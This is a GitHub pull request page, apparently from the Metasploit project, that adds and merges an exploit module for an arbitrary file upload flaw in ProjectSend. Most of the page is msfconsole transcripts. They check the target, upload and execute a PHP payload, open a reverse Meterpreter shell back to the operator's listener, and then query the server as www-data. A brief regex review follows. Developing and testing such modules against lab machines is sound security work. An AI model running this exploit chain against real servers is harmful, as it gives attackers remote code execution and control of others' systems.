Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ProjectSend Arbitrary File Upload module #4459

Merged
merged 1 commit into from Dec 26, 2014

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Dec 23, 2014

Add ProjectSend Arbitrary File Upload module

Check

msf > use exploit/unix/webapp/projectsend_upload_exec
msf exploit(projectsend_upload_exec) > set RHOST 10.6.6.55
RHOST => 10.6.6.55
msf exploit(projectsend_upload_exec) > check
[*] 10.6.6.55:80 - The target is not exploitable.
msf exploit(projectsend_upload_exec) > set verbose true
verbose => true
msf exploit(projectsend_upload_exec) > set targeturi /ProjectSend-r561/ 
targeturi => /ProjectSend-r561/
msf exploit(projectsend_upload_exec) > check
[+] 10.6.6.55:80 - The target is vulnerable.

Run

msf exploit(projectsend_upload_exec) > run

[*] Started reverse handler on 10.6.6.66:4444 
[*] 10.6.6.55:80 - Uploading file 'YA577D9ea8L44gf.php' (1796 bytes)
[+] 10.6.6.55:80 - Payload uploaded successfully (YA577D9ea8L44gf.php)
[*] 10.6.6.55:80 - Executing upload/files/YA577D9ea8L44gf.php...
[*] Sending stage (40551 bytes) to 10.6.6.55
[*] Meterpreter session 1 opened (10.6.6.66:4444 -> 10.6.6.55:58917) at 2014-12-20 13:25:45 -0500
[+] Deleted YA577D9ea8L44gf.php
^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)

elsif res.code.to_i == 200 && res.body =~ /<\?php/
vprint_error("#{peer} - File process-upload.php is not executable")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
Copy link
Contributor

@wchen-r7 wchen-r7 Dec 23, 2014

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this supposed to be /sys\.config\.php/ or actually /sys.config.php/ ?

Copy link
Contributor Author

@bcoles bcoles Dec 23, 2014

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The former; /sys\.config\.php/

@jvazquez-r7 jvazquez-r7 self-assigned this Dec 26, 2014
@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Dec 26, 2014

testing...

@jvazquez-r7 jvazquez-r7 merged commit 5c82b8a into rapid7:master Dec 26, 2014
1 check passed
@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Dec 26, 2014

Did minor cleanup here: b5b0be9

Test:

msf exploit(projectsend_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
Land #4459, @bcoles's ProjectSend Arbitrary File Upload module
[*] 172.16.158.137:80 - Uploading file 'xozXXw1.php' (1794 bytes)
[+] 172.16.158.137:80 - Payload uploaded successfully (xozXXw1.php)
[*] 172.16.158.137:80 - Executing upload/files/xozXXw1.php...
[*] Sending stage (40499 bytes) to 172.16.158.137
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.137:38949) at 2014-12-26 11:23:44 -0600
[+] Deleted xozXXw1.php
[*] 172.16.158.137:80 - Request timed out while executing

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

thanks @bcoles ! landed

@bcoles bcoles deleted the projectsend_upload_exec branch May 5, 2015
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants